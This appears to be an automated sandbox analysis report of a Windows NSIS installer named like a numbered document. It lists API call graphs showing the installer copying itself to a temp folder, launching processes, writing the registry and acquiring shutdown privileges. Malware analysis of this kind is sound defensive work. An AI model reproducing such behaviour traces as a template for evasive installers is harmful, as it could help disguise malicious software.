402d3e 17 API calls 4137->4138 4139 402909 FindFirstFileW 4138->4139 4140 402931 4139->4140 4143 40291c 4139->4143 4141 40293a 4140->4141 4145 406358 wsprintfW 4140->4145 4146 406411 lstrcpynW 4141->4146 4145->4141 4146->4143 4164 402482 4165 402d3e 17 API calls 4164->4165 4166 402494 4165->4166 4167 402d3e 17 API calls 4166->4167 4168 40249e 4167->4168 4181 402dce 4168->4181 4171 402bc2 4172 4024d6 4174 4024e2 4172->4174 4185 402d1c 4172->4185 4173 402d3e 17 API calls 4175 4024cc lstrlenW 4173->4175 4177 402501 RegSetValueExW 4174->4177 4188 40324c 4174->4188 4175->4172 4179 402517 RegCloseKey 4177->4179 4179->4171 4182 402de9 4181->4182 4208 4062ac 4182->4208 4186 40644e 17 API calls 4185->4186 4187 402d31 4186->4187 4187->4174 4190 403265 4188->4190 4189 403293 4212 403467 4189->4212 4190->4189 4215 40347d SetFilePointer 4190->4215 4194 403400 4196 403442 4194->4196 4201 403404 4194->4201 4195 4032b0 GetTickCount 4197 4033ea 4195->4197 4204 4032ff 4195->4204 4198 403467 ReadFile 4196->4198 4197->4177 4198->4197 4199 403467 ReadFile 4199->4204 4200 403467 ReadFile 4200->4201 4201->4197 4201->4200 4202 405fb9 WriteFile 4201->4202 4202->4201 4203 403355 GetTickCount 4203->4204 4204->4197 4204->4199 4204->4203 4205 40337a MulDiv wsprintfW 4204->4205 4207 405fb9 WriteFile 4204->4207 4206 405479 24 API calls 4205->4206 4206->4204 4207->4204 4209 4062bb 4208->4209 4210 4024ae 4209->4210 4211 4062c6 RegCreateKeyExW 4209->4211 4210->4171 4210->4172 4210->4173 4211->4210 4213 405f8a ReadFile 4212->4213 4214 40329e 4213->4214 4214->4194 4214->4195 4214->4197 4215->4189 5396 401503 5397 40150b 5396->5397 5399 40151e 5396->5399 5398 402d1c 17 API calls 5397->5398 5398->5399 5400 402889 5401 402890 5400->5401 5403 402b0d 5400->5403 5402 402d1c 17 API calls 5401->5402 5404 402897 5402->5404 5405 4028a6 SetFilePointer 5404->5405 5405->5403 5406 4028b6 5405->5406 5408 406358 wsprintfW 5406->5408 5408->5403 5409 40190c 5410 401943 5409->5410 5411 402d3e 17 API calls 5410->5411 5412 401948 5411->5412 5413 405b23 67 API calls 5412->5413 5414 401951 5413->5414 4601 403e8e 4602 403fe1 4601->4602 4603 403ea6 4601->4603 4605 403ff2 GetDlgItem GetDlgItem 4602->4605 4610 404032 4602->4610 4603->4602 4604 403eb2 4603->4604 4606 403ed0 4604->4606 4607 403ebd SetWindowPos 4604->4607 4608 404367 18 API calls 4605->4608 4612 403ed5 ShowWindow 4606->4612 4613 403eed 4606->4613 4607->4606 4614 40401c SetClassLongW 4608->4614 4609 40408c 4611 4043b3 SendMessageW 4609->4611 4615 403fdc 4609->4615 4610->4609 4619 401389 2 API calls 4610->4619 4641 40409e 4611->4641 4612->4613 4616 403ef5 DestroyWindow 4613->4616 4617 403f0f 4613->4617 4618 40140b 2 API calls 4614->4618 4620 404311 4616->4620 4621 403f14 SetWindowLongW 4617->4621 4622 403f25 4617->4622 4618->4610 4623 404064 4619->4623 4620->4615 4630 404321 ShowWindow 4620->4630 4621->4615 4626 403f31 GetDlgItem 4622->4626 4627 403fce 4622->4627 4623->4609 4628 404068 SendMessageW 4623->4628 4624 40140b 2 API calls 4624->4641 4625 4042f2 DestroyWindow EndDialog 4625->4620 4631 403f61 4626->4631 4632 403f44 SendMessageW IsWindowEnabled 4626->4632 4682 4043ce 4627->4682 4628->4615 4630->4615 4634 403f6e 4631->4634 4635 403fb5 SendMessageW 4631->4635 4636 403f81 4631->4636 4645 403f66 4631->4645 4632->4615 4632->4631 4633 40644e 17 API calls 4633->4641 4634->4635 4634->4645 4635->4627 4638 403f89 4636->4638 4639 403f9e 4636->4639 4642 40140b 2 API calls 4638->4642 4643 40140b 2 API calls 4639->4643 4640 403f9c 4640->4627 4641->4615 4641->4624 4641->4625 4641->4633 4644 404367 18 API calls 4641->4644 4663 404232 DestroyWindow 4641->4663 4673 404367 4641->4673 4642->4645 4646 403fa5 4643->4646 4644->4641 4679 404340 4645->4679 4646->4627 4646->4645 4648 404119 GetDlgItem 4649 404136 ShowWindow KiUserCallbackDispatcher 4648->4649 4650 40412e 4648->4650 4676 404389 EnableWindow 4649->4676 4650->4649 4652 404160 EnableWindow 4657 404174 4652->4657 4653 404179 GetSystemMenu EnableMenuItem SendMessageW 4654 4041a9 SendMessageW 4653->4654 4653->4657 4654->4657 4656 403e6f 18 API calls 4656->4657 4657->4653 4657->4656 4677 40439c SendMessageW 4657->4677 4678 406411 lstrcpynW 4657->4678 4659 4041d8 lstrlenW 4660 40644e 17 API calls 4659->4660 4661 4041ee SetWindowTextW 4660->4661 4662 401389 2 API calls 4661->4662 4662->4641 4663->4620 4664 40424c CreateDialogParamW 4663->4664 4664->4620 4665 40427f 4664->4665 4666 404367 18 API calls 4665->4666 4667 40428a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4666->4667 4668 401389 2 API calls 4667->4668 4669 4042d0 4668->4669 4669->4615 4670 4042d8 ShowWindow 4669->4670 4671 4043b3 SendMessageW 4670->4671 4672 4042f0 4671->4672 4672->4620 4674 40644e 17 API calls 4673->4674 4675 404372 SetDlgItemTextW 4674->4675 4675->4648 4676->4652 4677->4657 4678->4659 4680 404347 4679->4680 4681 40434d SendMessageW 4679->4681 4680->4681 4681->4640 4683 404491 4682->4683 4684 4043e6 GetWindowLongW 4682->4684 4683->4615 4684->4683 4685 4043fb 4684->4685 4685->4683 4686 404428 GetSysColor 4685->4686 4687 40442b 4685->4687 4686->4687 4688 404431 SetTextColor 4687->4688 4689 40443b SetBkMode 4687->4689 4688->4689 4690 404453 GetSysColor 4689->4690 4691 404459 4689->4691 4690->4691 4692 404460 SetBkColor 4691->4692 4693 40446a 4691->4693 4692->4693 4693->4683 4694 404484 CreateBrushIndirect 4693->4694 4695 40447d DeleteObject 4693->4695 4694->4683 4695->4694 5415 40190f 5416 402d3e 17 API calls 5415->5416 5417 401916 5416->5417 5418 405a77 MessageBoxIndirectW 5417->5418 5419 40191f 5418->5419 5420 404811 5421 404821 5420->5421 5422 404847 5420->5422 5423 404367 18 API calls 5421->5423 5424 4043ce 8 API calls 5422->5424 5425 40482e SetDlgItemTextW 5423->5425 5426 404853 5424->5426 5425->5422 5427 401491 5428 405479 24 API calls 5427->5428 5429 401498 5428->5429 5430 401f12 5431 402d3e 17 API calls 5430->5431 5432 401f18 5431->5432 5433 402d3e 17 API calls 5432->5433 5434 401f21 5433->5434 5435 402d3e 17 API calls 5434->5435 5436 401f2a 5435->5436 5437 402d3e 17 API calls 5436->5437 5438 401f33 5437->5438 5439 401423 24 API calls 5438->5439 5440 401f3a 5439->5440 5447 405a3d ShellExecuteExW 5440->5447 5442 401f82 5444 402925 5442->5444 5448 4068b1 WaitForSingleObject 5442->5448 5445 401f9f CloseHandle 5445->5444 5447->5442 5449 4068cb 5448->5449 5450 4068dd GetExitCodeProcess 5449->5450 5451 406842 2 API calls 5449->5451 5450->5445 5452 4068d2 WaitForSingleObject 5451->5452 5452->5449 5453 402614 5454 402d3e 17 API calls 5453->5454 5455 40261b 5454->5455 5458 405f07 GetFileAttributesW CreateFileW 5455->5458 5457 402627 5458->5457 5001 402596 5002 402d7e 17 API calls 5001->5002 5003 4025a0 5002->5003 5004 402d1c 17 API calls 5003->5004 5005 4025a9 5004->5005 5006 4025d1 RegEnumValueW 5005->5006 5007 4025c5 RegEnumKeyW 5005->5007 5008 402925 5005->5008 5009 4025ed RegCloseKey 5006->5009 5010 4025e6 5006->5010 5007->5009 5009->5008 5010->5009 5459 401d17 5460 402d1c 17 API calls 5459->5460 5461 401d1d IsWindow 5460->5461 5462 401a20 5461->5462 5463 401b9b 5464 401ba8 5463->5464 5465 401bec 5463->5465 5468 401c31 5464->5468 5471 401bbf 5464->5471 5466 401bf1 5465->5466 5467 401c16 GlobalAlloc 5465->5467 5481 402395 5466->5481 5484 406411 lstrcpynW 5466->5484 5469 40644e 17 API calls 5467->5469 5470 40644e 17 API calls 5468->5470 5468->5481 5469->5468 5473 40238f 5470->5473 5482 406411 lstrcpynW 5471->5482 5477 405a77 MessageBoxIndirectW 5473->5477 5473->5481 5475 401c03 GlobalFree 5475->5481 5476 401bce 5483 406411 lstrcpynW 5476->5483 5477->5481 5479 401bdd 5485 406411 lstrcpynW 5479->5485 5482->5476 5483->5479 5484->5475 5485->5481 5486 40449d lstrcpynW lstrlenW 5487 402b9d SendMessageW 5488 402bc2 5487->5488 5489 402bb7 InvalidateRect 5487->5489 5489->5488 5490 40149e 5491 402395 5490->5491 5492 4014ac PostQuitMessage 5490->5492 5492->5491 5493 403a9e 5494 403aa9 5493->5494 5495 403ab0 GlobalAlloc 5494->5495 5496 403aad 5494->5496 5495->5496 5497 6edf1000 5500 6edf101b 5497->5500 5501 6edf1516 GlobalFree 5500->5501 5502 6edf1020 5501->5502 5503 6edf1027 GlobalAlloc 5502->5503 5504 6edf1024 5502->5504 5503->5504 5505 6edf153d 3 API calls 5504->5505 5506 6edf1019 5505->5506 4147 402522 4158 402d7e 4147->4158 4150 402d3e 17 API calls 4151 402535 4150->4151 4152 402540 RegQueryValueExW 4151->4152 4156 402925 4151->4156 4153 402560 4152->4153 4154 402566 RegCloseKey 4152->4154 4153->4154 4163 406358 wsprintfW 4153->4163 4154->4156 4159 402d3e 17 API calls 4158->4159 4160 402d95 4159->4160 4161 40627e RegOpenKeyExW 4160->4161 4162 40252c 4161->4162 4162->4150 4163->4154 4216 4021a2 4217 402d3e 17 API calls 4216->4217 4218 4021a9 4217->4218 4219 402d3e 17 API calls 4218->4219 4220 4021b3 4219->4220 4221 402d3e 17 API calls 4220->4221 4222 4021bd 4221->4222 4223 402d3e 17 API calls 4222->4223 4224 4021c7 4223->4224 4225 402d3e 17 API calls 4224->4225 4227 4021d1 4225->4227 4226 402210 CoCreateInstance 4231 40222f 4226->4231 4227->4226 4228 402d3e 17 API calls 4227->4228 4228->4226 4229 401423 24 API calls 4230 4022ee 4229->4230 4231->4229 4231->4230 5507 6edf103d 5508 6edf101b 5 API calls 5507->5508 5509 6edf1056 5508->5509 4254 4015a3 4255 402d3e 17 API calls 4254->4255 4256 4015aa SetFileAttributesW 4255->4256 4257 4015bc 4256->4257 5510 401fa4 5511 402d3e 17 API calls 5510->5511 5512 401faa 5511->5512 5513 405479 24 API calls 5512->5513 5514 401fb4 5513->5514 5515 4059fa 2 API calls 5514->5515 5516 401fba 5515->5516 5518 4068b1 5 API calls 5516->5518 5519 402925 5516->5519 5522 401fdd CloseHandle 5516->5522 5520 401fcf 5518->5520 5520->5522 5523 406358 wsprintfW 5520->5523 5522->5519 5523->5522 5524 404526 5525 40453e 5524->5525 5529 404658 5524->5529 5530 404367 18 API calls 5525->5530 5526 4046c2 5527 40478c 5526->5527 5528 4046cc GetDlgItem 5526->5528 5535 4043ce 8 API calls 5527->5535 5531 4046e6 5528->5531 5532 40474d 5528->5532 5529->5526 5529->5527 5533 404693 GetDlgItem SendMessageW 5529->5533 5534 4045a5 5530->5534 5531->5532 5539 40470c SendMessageW LoadCursorW SetCursor 5531->5539 5532->5527 5536 40475f 5532->5536 5557 404389 EnableWindow 5533->5557 5538 404367 18 API calls 5534->5538 5545 404787 5535->5545 5540 404775 5536->5540 5541 404765 SendMessageW 5536->5541 5543 4045b2 CheckDlgButton 5538->5543 5558 4047d5 5539->5558 5540->5545 5546 40477b SendMessageW 5540->5546 5541->5540 5542 4046bd 5547 4047b1 SendMessageW 5542->5547 5555 404389 EnableWindow 5543->5555 5546->5545 5547->5526 5550 4045d0 GetDlgItem 5556 40439c SendMessageW 5550->5556 5552 4045e6 SendMessageW 5553 404603 GetSysColor 5552->5553 5554 40460c SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5552->5554 5553->5554 5554->5545 5555->5550 5556->5552 5557->5542 5561 405a3d ShellExecuteExW 5558->5561 5560 40473b LoadCursorW SetCursor 5560->5532 5561->5560 4522 4023aa 4523 4023b2 4522->4523 4524 4023b8 4522->4524 4525 402d3e 17 API calls 4523->4525 4526 4023c6 4524->4526 4527 402d3e 17 API calls 4524->4527 4525->4524 4528 4023d4 4526->4528 4530 402d3e 17 API calls 4526->4530 4527->4526 4529 402d3e 17 API calls 4528->4529 4531 4023dd WritePrivateProfileStringW 4529->4531 4530->4528 5562 40202a 5563 402d3e 17 API calls 5562->5563 5564 402031 5563->5564 5565 406806 5 API calls 5564->5565 5566 402040 5565->5566 5567 40205c GlobalAlloc 5566->5567 5572 4020c4 5566->5572 5568 402070 5567->5568 5567->5572 5569 406806 5 API calls 5568->5569 5570 402077 5569->5570 5571 406806 5 API calls 5570->5571 5573 402081 5571->5573 5573->5572 5577 406358 wsprintfW 5573->5577 5575 4020b6 5578 406358 wsprintfW 5575->5578 5577->5575 5578->5572 5579 402f2b 5580 402f56 5579->5580 5581 402f3d SetTimer 5579->5581 5582 402fab 5580->5582 5583 402f70 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5580->5583 5581->5580 5583->5582 4532 40242c 4533 402434 4532->4533 4534 40245f 4532->4534 4536 402d7e 17 API calls 4533->4536 4535 402d3e 17 API calls 4534->4535 4537 402466 4535->4537 4538 40243b 4536->4538 4544 402dfc 4537->4544 4540 402445 4538->4540 4543 402473 4538->4543 4541 402d3e 17 API calls 4540->4541 4542 40244c RegDeleteValueW RegCloseKey 4541->4542 4542->4543 4545 402e10 4544->4545 4546 402e09 4544->4546 4545->4546 4548 402e41 4545->4548 4546->4543 4549 40627e RegOpenKeyExW 4548->4549 4550 402e6f 4549->4550 4551 402f24 4550->4551 4552 402e79 4550->4552 4551->4546 4553 402ea2 4552->4553 4554 402e7f RegEnumValueW 4552->4554 4555 402f09 RegCloseKey 4553->4555 4556 402ede RegEnumKeyW 4553->4556 4557 402ee7 RegCloseKey 4553->4557 4559 402e41 6 API calls 4553->4559 4554->4553 4554->4555 4555->4551 4556->4553 4556->4557 4558 406806 5 API calls 4557->4558 4560 402ef7 4558->4560 4559->4553 4561 402f19 4560->4561 4562 402efb RegDeleteKeyW 4560->4562 4561->4551 4562->4551 5584 404bae 5585 404bda 5584->5585 5586 404bbe 5584->5586 5588 404be0 SHGetPathFromIDListW 5585->5588 5589 404c0d 5585->5589 5595 405a5b GetDlgItemTextW 5586->5595 5591 404bf0 5588->5591 5592 404bf7 SendMessageW 5588->5592 5590 404bcb SendMessageW 5590->5585 5593 40140b 2 API calls 5591->5593 5592->5589 5593->5592 5595->5590 5596 401a30 5597 402d3e 17 API calls 5596->5597 5598 401a39 ExpandEnvironmentStringsW 5597->5598 5599 401a4d 5598->5599 5601 401a60 5598->5601 5600 401a52 lstrcmpW 5599->5600 5599->5601 5600->5601 5607 401735 5608 402d3e 17 API calls 5607->5608 5609 40173c SearchPathW 5608->5609 5610 401757 5609->5610 5611 402636 5612 402665 5611->5612 5613 40264a 5611->5613 5615 402695 5612->5615 5616 40266a 5612->5616 5614 402d1c 17 API calls 5613->5614 5623 402651 5614->5623 5618 402d3e 17 API calls 5615->5618 5617 402d3e 17 API calls 5616->5617 5619 402671 5617->5619 5620 40269c lstrlenW 5618->5620 5628 406433 WideCharToMultiByte 5619->5628 5620->5623 5622 402685 lstrlenA 5622->5623 5624 4026df 5623->5624 5625 4026c9 5623->5625 5627 405fe8 5 API calls 5623->5627 5625->5624 5626 405fb9 WriteFile 5625->5626 5626->5624 5627->5625 5628->5622 5629 401d38 5630 402d1c 17 API calls 5629->5630 5631 401d3f 5630->5631 5632 402d1c 17 API calls 5631->5632 5633 401d4b GetDlgItem 5632->5633 5634 402630 5633->5634 5635 4014b8 5636 4014be 5635->5636 5637 401389 2 API calls 5636->5637 5638 4014c6 5637->5638 5639 4055b8 5640 405762 5639->5640 5641 4055d9 GetDlgItem GetDlgItem GetDlgItem 5639->5641 5643 405793 5640->5643 5644 40576b GetDlgItem CreateThread CloseHandle 5640->5644 5684 40439c SendMessageW 5641->5684 5645 4057be 5643->5645 5647 4057e3 5643->5647 5648 4057aa ShowWindow ShowWindow 5643->5648 5644->5643 5649 40581e 5645->5649 5651 4057d2 5645->5651 5652 4057f8 ShowWindow 5645->5652 5646 405649 5654 405650 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5646->5654 5653 4043ce 8 API calls 5647->5653 5686 40439c SendMessageW 5648->5686 5649->5647 5657 40582c SendMessageW 5649->5657 5658 404340 SendMessageW 5651->5658 5659 405818 5652->5659 5660 40580a 5652->5660 5663 4057f1 5653->5663 5655 4056a2 SendMessageW SendMessageW 5654->5655 5656 4056be 5654->5656 5655->5656 5661 4056d1 5656->5661 5662 4056c3 SendMessageW 5656->5662 5657->5663 5664 405845 CreatePopupMenu 5657->5664 5658->5647 5666 404340 SendMessageW 5659->5666 5665 405479 24 API calls 5660->5665 5668 404367 18 API calls 5661->5668 5662->5661 5667 40644e 17 API calls 5664->5667 5665->5659 5666->5649 5669 405855 AppendMenuW 5667->5669 5670 4056e1 5668->5670 5671 405872 GetWindowRect 5669->5671 5672 405885 TrackPopupMenu 5669->5672 5673 4056ea ShowWindow 5670->5673 5674 40571e GetDlgItem SendMessageW 5670->5674 5671->5672 5672->5663 5675 4058a0 5672->5675 5676 405700 ShowWindow 5673->5676 5677 40570d 5673->5677 5674->5663 5678 405745 SendMessageW SendMessageW 5674->5678 5679 4058bc SendMessageW 5675->5679 5676->5677 5685 40439c SendMessageW 5677->5685 5678->5663 5679->5679 5680 4058d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5679->5680 5682 4058fe SendMessageW 5680->5682 5682->5682 5683 405927 GlobalUnlock SetClipboardData CloseClipboard 5682->5683 5683->5663 5684->5646 5685->5674 5686->5645 5687 4028bb 5688 4028c1 5687->5688 5689 402bc2 5688->5689 5690 4028c9 FindClose 5688->5690 5690->5689 5691 6edf2ca3 5692 6edf2cbb 5691->5692 5693 6edf158f 2 API calls 5692->5693 5694 6edf2cd6 5693->5694 5037 405a3d ShellExecuteExW

                                                                Executed Functions

                                                                Function 004034C5 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410stringfilecomCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 4034c5-403502 SetErrorMode GetVersion 1 403504-40350c call 406806 0->1 2 403515 0->2 1->2 8 40350e 1->8 3 40351a-40352e call 406796 lstrlenA 2->3 9 403530-40354c call 406806 * 3 3->9 8->2 16 40355d-4035bc #17 OleInitialize SHGetFileInfoW call 406411 GetCommandLineW call 406411 9->16 17 40354e-403554 9->17 24 4035c6-4035e0 call 405d13 CharNextW 16->24 25 4035be-4035c5 16->25 17->16 22 403556 17->22 22->16 28 4035e6-4035ec 24->28 29 4036f7-403711 GetTempPathW call 403494 24->29 25->24 31 4035f5-4035f9 28->31 32 4035ee-4035f3 28->32 36 403713-403731 GetWindowsDirectoryW lstrcatW call 403494 29->36 37 403769-403783 DeleteFileW call 403015 29->37 34 403600-403604 31->34 35 4035fb-4035ff 31->35 32->31 32->32 38 4036c3-4036d0 call 405d13 34->38 39 40360a-403610 34->39 35->34 36->37 54 403733-403763 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403494 36->54 57 403834-403844 call 403a06 OleUninitialize 37->57 58 403789-40378f 37->58 55 4036d2-4036d3 38->55 56 4036d4-4036da 38->56 43 403612-40361a 39->43 44 40362b-403664 39->44 50 403621 43->50 51 40361c-40361f 43->51 45 403681-4036bb 44->45 46 403666-40366b 44->46 45->38 53 4036bd-4036c1 45->53 46->45 52 40366d-403675 46->52 50->44 51->44 51->50 60 403677-40367a 52->60 61 40367c 52->61 53->38 62 4036e2-4036f0 call 406411 53->62 54->37 54->57 55->56 56->28 64 4036e0 56->64 74 40396a-403970 57->74 75 40384a-40385a call 405a77 ExitProcess 57->75 65 403824-40382b call 403ae0 58->65 66 403795-4037a0 call 405d13 58->66 60->45 60->61 61->45 69 4036f5 62->69 64->69 73 403830 65->73 77 4037a2-4037d7 66->77 78 4037ee-4037f8 66->78 69->29 73->57 80 403972-403988 GetCurrentProcess OpenProcessToken 74->80 81 4039ee-4039f6 74->81 82 4037d9-4037dd 77->82 85 403860-403874 call 4059e2 lstrcatW 78->85 86 4037fa-403808 call 405dee 78->86 88 40398a-4039b8 LookupPrivilegeValueW AdjustTokenPrivileges 80->88 89 4039be-4039cc call 406806 80->89 83 4039f8 81->83 84 4039fc-403a00 ExitProcess 81->84 90 4037e6-4037ea 82->90 91 4037df-4037e4 82->91 83->84 100 403881-40389b lstrcatW lstrcmpiW 85->100 101 403876-40387c lstrcatW 85->101 86->57 99 40380a-403820 call 406411 * 2 86->99 88->89 102 4039da-4039e5 ExitWindowsEx 89->102 103 4039ce-4039d8 89->103 90->82 95 4037ec 90->95 91->90 91->95 95->78 99->65 100->57 106 40389d-4038a0 100->106 101->100 102->81 104 4039e7-4039e9 call 40140b 102->104 103->102 103->104 104->81 110 4038a2-4038a7 call 405948 106->110 111 4038a9 call 4059c5 106->111 115 4038ae-4038bc SetCurrentDirectoryW 110->115 111->115 118 4038c9-4038f2 call 406411 115->118 119 4038be-4038c4 call 406411 115->119 123 4038f7-403913 call 40644e DeleteFileW 118->123 119->118 126 403954-40395c 123->126 127 403915-403925 CopyFileW 123->127 126->123 128 40395e-403965 call 4061d7 126->128 127->126 129 403927-403947 call 4061d7 call 40644e call 4059fa 127->129 128->57 129->126 138 403949-403950 CloseHandle 129->138 138->126
                                                                APIs
                                                                • SetErrorMode.KERNELBASE ref: 004034E8
                                                                • GetVersion.KERNEL32 ref: 004034EE
                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403521
                                                                • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040355E
                                                                • OleInitialize.OLE32(00000000), ref: 00403565
                                                                • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403581
                                                                • GetCommandLineW.KERNEL32(00433F00,NSIS Error,?,00000007,00000009,0000000B), ref: 00403596
                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\No. 1349240400713.exe",00000020,"C:\Users\user\Desktop\No. 1349240400713.exe",00000000,?,00000007,00000009,0000000B), ref: 004035CE
                                                                  • Part of subcall function 00406806: GetModuleHandleA.KERNEL32(?,00000020,?,00403537,0000000B), ref: 00406818
                                                                  • Part of subcall function 00406806: GetProcAddress.KERNEL32(00000000,?), ref: 00406833
                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403708
                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403719
                                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403725
                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403739
                                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403741
                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403752
                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040375A
                                                                • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 0040376E
                                                                  • Part of subcall function 00406411: lstrcpynW.KERNEL32(?,?,00000400,00403596,00433F00,NSIS Error,?,00000007,00000009,0000000B), ref: 0040641E
                                                                • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403839
                                                                • ExitProcess.KERNEL32 ref: 0040385A
                                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\No. 1349240400713.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 0040386D
                                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A26C,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\No. 1349240400713.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 0040387C
                                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\No. 1349240400713.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403887
                                                                • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\No. 1349240400713.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403893
                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004038AF
                                                                • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,00000009,?,00000007,00000009,0000000B), ref: 00403909
                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\No. 1349240400713.exe,0042AA28,00000001,?,00000007,00000009,0000000B), ref: 0040391D
                                                                • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000,?,00000007,00000009,0000000B), ref: 0040394A
                                                                • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403979
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403980
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403995
                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 004039B8
                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 004039DD
                                                                • ExitProcess.KERNEL32 ref: 00403A00
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                • String ID: "C:\Users\user\Desktop\No. 1349240400713.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\No. 1349240400713.exe$C:\Users\user\udstrmningsdysernes\eir\Speckly$C:\Users\user\udstrmningsdysernes\eir\Speckly$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                • API String ID: 3441113951-3825682153
                                                                • Opcode ID: 328609fffe7ac21a5c65c3985b48827762127d115727c2e02487c33ae415ffa8
                                                                • Instruction ID: 633452ec6b1f102921f1489b21fe302f429ce1b90f1906ff0e0a9b5b291269fb
                                                                • Opcode Fuzzy Hash: 328609fffe7ac21a5c65c3985b48827762127d115727c2e02487c33ae415ffa8
                                                                • Instruction Fuzzy Hash: 7DD12671600311ABE7207F659D45B3B3AACEB8070AF11443FF581B62D1DBBD89518B6E
                                                                Function 6EDF1B5F Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 6EDF121B: GlobalAlloc.KERNELBASE(00000040,?,6EDF123B,?,6EDF12DF,00000019,6EDF11BE,-000000A0), ref: 6EDF1225
                                                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6EDF1C8D
                                                                • lstrcpyW.KERNEL32(00000008,?), ref: 6EDF1CD5
                                                                • lstrcpyW.KERNEL32(00000808,?), ref: 6EDF1CDF
                                                                • GlobalFree.KERNEL32(00000000), ref: 6EDF1CF2
                                                                • GlobalFree.KERNEL32(?), ref: 6EDF1DD4
                                                                • GlobalFree.KERNEL32(?), ref: 6EDF1DD9
                                                                • GlobalFree.KERNEL32(?), ref: 6EDF1DDE
                                                                • GlobalFree.KERNEL32(00000000), ref: 6EDF1FC8
                                                                • lstrcpyW.KERNEL32(?,?), ref: 6EDF2182
